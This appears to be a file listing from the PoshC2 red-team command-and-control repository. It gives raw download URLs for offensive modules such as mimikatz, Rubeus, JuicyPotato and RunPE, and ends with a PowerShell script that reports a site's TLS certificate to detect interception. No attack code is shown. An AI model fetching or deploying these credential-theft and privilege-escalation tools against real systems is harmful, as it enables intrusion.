https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/driversigs.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/enum_filter_driver.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enum_filter_driver.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/enum_filter_driver.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enum_filter_driver.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/env.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/env.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/env.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/findLoadedModule.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/findLoadedModule.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/findLoadedModule.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/findLoadedModule.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/get-netsession.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get-netsession.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/get-netsession.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get-netsession.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/get_password_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get_password_policy.x64.o 
-------------------------------------------------------------------------------- /resources/modules/OFs/get_password_policy.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get_password_policy.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/inlineExecute-Assemblyx64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/inlineExecute-Assemblyx64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ipconfig.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ipconfig.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ldapsearch.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ldapsearch.x86.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ldapsearch.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/listdns.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listdns.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/listdns.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listdns.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/listmods.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listmods.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/listmods.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listmods.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/locale.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/locale.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/locale.x86.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/locale.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netgroup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netgroup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netlocalgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netlocalgroup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netlocalgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netlocalgroup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netshares.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netshares.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netshares.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netshares.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netstat.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netstat.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netstat.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netstat.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuse.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuse.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuse.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuse.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuser.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuser.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuser.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuserenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuserenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuserenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netview.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netview.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netview.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netview.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/nonpagedldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nonpagedldapsearch.x64.o -------------------------------------------------------------------------------- 
/resources/modules/OFs/nonpagedldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nonpagedldapsearch.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/notepad.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/notepad.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/notepad.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/notepad.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/nslookup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nslookup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/nslookup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nslookup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/probe.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/probe.x64.o -------------------------------------------------------------------------------- 
/resources/modules/OFs/probe.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/probe.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/reg_query.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/reg_query.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/resources.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/resources.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/resources.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/resources.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/routeprint.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/routeprint.x64.o -------------------------------------------------------------------------------- 
/resources/modules/OFs/routeprint.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/routeprint.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_enum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_enum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qc.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qc.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qc.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qc.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qdescription.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qdescription.x64.o -------------------------------------------------------------------------------- 
/resources/modules/OFs/sc_qdescription.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qdescription.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qfailure.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qfailure.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qfailure.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qfailure.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qtriggerinfo.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qtriggerinfo.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qtriggerinfo.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qtriggerinfo.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_query.x64.o 
-------------------------------------------------------------------------------- /resources/modules/OFs/sc_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_query.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksquery.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksquery.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksquery.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksquery.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/tasklist.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/tasklist.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/tasklist.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/uptime.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/uptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/uptime.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/vssenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/vssenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/vssenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/vssenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/whoami.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/whoami.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/whoami.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/windowlist.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/windowlist.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/wmi_query.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/wmi_query.x86.o -------------------------------------------------------------------------------- /resources/modules/PBind.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PBind.exe -------------------------------------------------------------------------------- /resources/modules/PEs/ATPMiniDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/ATPMiniDump.exe -------------------------------------------------------------------------------- /resources/modules/PEs/JuicyPotato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/JuicyPotato.exe -------------------------------------------------------------------------------- /resources/modules/PEs/MS-RPRN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/MS-RPRN.exe -------------------------------------------------------------------------------- /resources/modules/PEs/NetMan-Dll.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/NetMan-Dll.exe -------------------------------------------------------------------------------- /resources/modules/PEs/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/SpoolSample.exe -------------------------------------------------------------------------------- /resources/modules/PEs/UACME.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/UACME.txt -------------------------------------------------------------------------------- /resources/modules/PEs/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/mimikatz.exe -------------------------------------------------------------------------------- /resources/modules/PEs/net.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/net.exe -------------------------------------------------------------------------------- /resources/modules/PGrabber.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PGrabber.dll -------------------------------------------------------------------------------- /resources/modules/PS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PS.exe -------------------------------------------------------------------------------- /resources/modules/PassTheCert.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PassTheCert.exe -------------------------------------------------------------------------------- /resources/modules/PingCS.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PingCS.exe -------------------------------------------------------------------------------- /resources/modules/PortScanner.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PortScanner.dll -------------------------------------------------------------------------------- /resources/modules/PwrStatusTracker.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PwrStatusTracker.dll -------------------------------------------------------------------------------- /resources/modules/RegSave.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RegSave.exe -------------------------------------------------------------------------------- /resources/modules/Rubeus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Rubeus.exe -------------------------------------------------------------------------------- /resources/modules/RunAs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunAs.exe -------------------------------------------------------------------------------- /resources/modules/RunOF-Debug.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunOF-Debug.exe -------------------------------------------------------------------------------- /resources/modules/RunOF.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunOF.exe -------------------------------------------------------------------------------- /resources/modules/RunPE-Debug.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunPE-Debug.exe -------------------------------------------------------------------------------- /resources/modules/RunPE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunPE.exe -------------------------------------------------------------------------------- /resources/modules/RunasCs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunasCs.exe -------------------------------------------------------------------------------- /resources/modules/SExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SExec.exe -------------------------------------------------------------------------------- /resources/modules/SQLQuery.exe: -------------------------------------------------------------------------------- 
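https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SQLQuery.exe -------------------------------------------------------------------------------- /resources/modules/SSLInspectionCheck.ps1: --------------------------------------------------------------------------------
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
    <#
    .SYNOPSIS
    Report the TLS certificate presented by $url as seen from this host.

    .DESCRIPTION
    Issues one HTTPS request to $url (optionally through $proxyurl, with
    $proxyuser/$proxypass) and writes the name, public key, serial number,
    thumbprint, validity dates and issuer of the certificate cached on the
    request's ServicePoint. Comparing these values with the certificate the
    site is known to serve shows whether a TLS-inspecting device sits in the
    path between this host and the site.

    .PARAMETER url
    HTTPS URL to check.

    .PARAMETER proxyurl
    Optional proxy address; a System.Net.WebProxy is created for it.

    .PARAMETER proxyuser
    Optional proxy user name. Only applied when $proxyurl is also given,
    because the credentials are attached to the WebProxy object.

    .PARAMETER proxypass
    Proxy password as plain text. It is wrapped in a SecureString only to
    build the PSCredential; the plain-text string itself stays in memory for
    the lifetime of the caller's variable.

    .OUTPUTS
    Strings via Write-Output: a "Checking" line, an exception line if the
    request fails, and either the certificate summary or a note that no
    certificate was captured.
    #>

    $expiration = $null
    $certName = $null
    $certPublicKeyString = $null
    $certSerialNumber = $null
    $certThumbprint = $null
    $certEffectiveDate = $null
    $certIssuer = $null

    write-output "Checking $($url)"
    $req = [Net.HttpWebRequest]::Create($url)
    $req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
    $wp = $null
    if ($proxyurl) {
        $wp = New-Object System.Net.WebProxy($proxyurl,$true)
        $req.Proxy=$wp;
    }
    # Credentials live on the proxy object, so without $proxyurl there is no
    # $wp to attach them to; the original dereferenced $null in that case.
    if ($proxyuser -and $wp) {
        $PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force;
        $getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS;
        $wp.Credentials = $getcreds;
    }

    # Timeout is in milliseconds.
    $req.timeout = 10000

    try {
        # Close the response so the connection is released; the negotiated
        # certificate remains available on the ServicePoint afterwards.
        $resp = $req.GetResponse()
        $resp.Close()
    } catch {
        write-output "Exception while checking URL $($url)`: $($_)"
    }

    # The certificate is only populated once a TLS handshake has completed.
    # A connection or proxy failure leaves it $null, so guard before calling
    # any of its accessors.
    $cert = $req.ServicePoint.Certificate
    if (-not $cert) {
        write-output "No certificate captured for $($url); the connection did not complete a TLS handshake."
        rv req
        return
    }

    $expiration = $cert.GetExpirationDateString()
    $certName = $cert.GetName()
    $certPublicKeyString = $cert.GetPublicKeyString()
    $certSerialNumber = $cert.GetSerialNumberString()
    $certThumbprint = $cert.GetCertHashString()
    $certEffectiveDate = $cert.GetEffectiveDateString()
    $certIssuer = $cert.GetIssuerName()
    write-output "Cert for site $($url). Check details:`n`nCert name: $($certName)`nCert public key: $($certPublicKeyString)`nCert serial number: $($certSerialNumber)`nCert thumbprint: $($certThumbprint)`nCert effective date: $($certEffectiveDate)`nCert Expiry: $($expiration)`nCert issuer: $($certIssuer)"
    rv req

}
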